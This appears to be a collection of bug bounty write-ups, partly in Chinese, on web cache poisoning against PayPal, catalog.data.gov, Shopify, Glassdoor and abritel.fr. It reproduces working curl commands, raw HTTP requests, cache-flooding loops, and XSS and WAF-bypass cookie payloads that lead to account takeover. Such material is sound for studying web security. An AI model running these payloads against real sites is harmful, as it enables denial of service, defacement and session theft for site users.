缓存中毒

DoS on PayPal via web cache poisoning

Summary

On https://paypal.com/, you could impact core functionality by using an invalid Transfer-Encoding header to replace JavaScript files from www.paypalobjects.com with the message '501 Not Implemented'. This was patched and awarded a $9,700 bounty.

Steps

  1. 插件搜索

  2. Transfer-Encoding头会导致501 Not Implemented”替换www.paypalobjects.com中的关键JavaScript文件来破坏核心功能

Impact

  1. DOS

  2. 9500$💵

Defacement of catalog.data.gov via web cache poisoning to stored DOMXSS

Summary

根本问题是服务器信任X-Forwarded-Host HTTP头,并使用它来填充body标记上的“data-site-root”和“data-locale-root”属性。然后,某些JavaScript从这些属性中指定的URL获取JSON文件,并将响应写入页面而不对其进行转义,从而导致DOMXSS漏洞。

Step

  1. curl格式

curl -i -s -k -X $'GET' \
-H $'Host: catalog.data.gov' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: /' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' -H $'x-forwarded-host: portswigger-labs.net/catalog.data.gov_json_xss/json.php?' -H $'Connection: close' \
$'https://catalog.data.gov/dataset/consumer-complaint-database?dontpoisoneveryone=6' > /dev/null

  1. http raw格式

GET /dataset/consumer-complaint-database?dontpoisoneveryone=6 HTTP/1.1
Host: catalog.data.gov
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
x-forwarded-host: portswigger-labs.net/catalog.data.gov_json_xss/json.php?
Connection: close

  1. 访问中毒页面:https://catalog.data.gov/dataset/consumer-complaint-database?dontpoisoneveryone=6 弹窗

Impact

750$💵

https://themes.shopify.com Host header web cache poisoning lead to DoS

Summary

Poison your cache with HTTP header Host header with arbitrary PORT which is not opened. This attack may lead to Denial of Services

Steps

  1. while true; do curl -ik "[https://themes.shopify.com:443/?g4mm4=hitthecache"](https://themes.shopify.com/?g4mm4=hitthecache%22) -H "Host: themes.shopify.com:1337"|grep ":1337"; sleep 0;echo 1; done

  2. while true; do curl -ik "[https://themes.shopify.com:443/"|grep](https://themes.shopify.com/%22%7Cgrep) ":1337"; done

Impact

$2,900💵

Web Cache Poisoning leads to XSS and DoS

Summary

利用URL解析器混淆与https://glassdoor.com/Job/和https://glassdoor.com/mz-survey/interview/collectQuestions_input.htm/ 下的反射XSS相结合,通过cookie和头参数将XSS有效载荷缓存到/URL/Award/和/List/ endpoints。 上述组合允许将自反射的XSS转换为存储的XSS,该存储的XSS在大约10分钟的持续时间内被缓存到本地CDN。 为了影响所有用户,研究人员指出,他们理论上可以针对所有CDN,每10分钟循环一次,以保持该高速缓存加载存储的XSS。

Steps

  1. http头+cookie 构成反射性xss

X-Forwarded-For: VULN
X-Forwarded-For: VULN><svg/onload=self[`alert`](document.domain)>
Cookie: gdId=VULN%22</script%20

  1. 利用web缓存 将反射性xss变为存储型xss

Cache Poisoning Allows Stored XSS Via hav Cookie Parameter (To Account Takeover)

Summary

I was able to Takeover Accounts Via Cache Poisoning (XSS)

This was possible due to 4 issues:

  1. hav cookie was reflected in the Response on https://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js

var hav="value from cookie"

  1. The server had a protection where it was "Hiding" double quotes, however the server was not doing that with greater than and less than symbols (<>) which allowed me to closed the script tag and using that double quotes protection I was able to Bypass the WAF easily

WAF would trigger when:

Cookie: hav=xss"</script><svg/onload=alert(document.domain)>

But using double quotes I was able to bypass the WAF:

Cookie: hav=xss"</sc"ript><sv"g/onloa"d=aler"t"(document.doma"in)>

Which reflected in the response as:

var hav="xss</script><svg/onload=alert(document.domain)>"

  1. The Server sees https://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js as a "cacheable" response, therefore the reflected value in the cookie was saved in that Page, any user who visited https://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js would get XSSed

  2. Session cookie was HTTPonly Flagged, however, In this same page where the XSS was, there was a JS Variable called window.INITIAL_STATE.system.cookie where the session was located in clear text

Steps

  1. Send this request

GET /annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js?xxxd HTTP/2
Host: www.abritel.fr
Cookie: hav=xss"</sc"ript><sv"g/onloa"d=aler"t"(document.doma"in)>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.abritel.fr/signup?enable_registration=true&redirectTo=%2Fsearch%2Fkeywords%3Asoissons-france-%28xss%29%2FminNightlyPrice%2F0%3FpetIncluded%3Dfalse%26filterByTotalPrice%3Dtrue%26ssr%3Dtrue&referrer_page_location=serp
Upgrade-Insecure-Requests: 1
Te: trailers

  1. Using another browser visit: https://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.jpeg?xxxd

Impact

Stored XSS to Account Takeover

PreviousWeb CacheNext缓存欺骗

Last updated